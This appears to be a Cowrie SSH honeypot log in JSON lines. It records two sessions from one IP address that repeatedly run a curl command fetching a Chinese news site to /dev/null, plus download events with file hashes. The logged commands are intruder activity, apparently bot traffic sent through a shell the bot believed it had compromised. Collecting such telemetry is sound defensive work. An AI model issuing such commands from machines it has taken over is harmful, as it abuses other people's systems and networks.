{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.057405Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.058468Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.066270Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.084849Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.086208Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.089716Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.095714Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.096909Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.103415Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.123016Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.124113Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.128554Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.131867Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.132849Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.135222Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.150618Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.174477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.175668Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.178112Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.180477Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.182037Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.200852Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.212569Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.214079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.215128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.219648Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.220684Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.241414Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.246156Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.252694Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.253860Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.276132Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.278158Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.294422Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.312387Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.313425Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.316545Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.317265Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.353608Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.354795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.357514Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.359505Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.403688Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.404970Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.407260Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.408256Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.413467Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.427655Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.431467Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.433645Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.443418Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.453319Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.458554Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.459598Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.464684Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.465634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.484047Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.499427Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.504134Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.506367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.507531Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.511708Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.512669Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.513448Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.528882Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.542301Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.547052Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.551802Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.552951Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.556209Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.557439Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.575272Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.584474Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.589692Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.592530Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.593462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.596007Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.596916Z","src_ip":"212.227.125.160","session":"7541ed730449"}
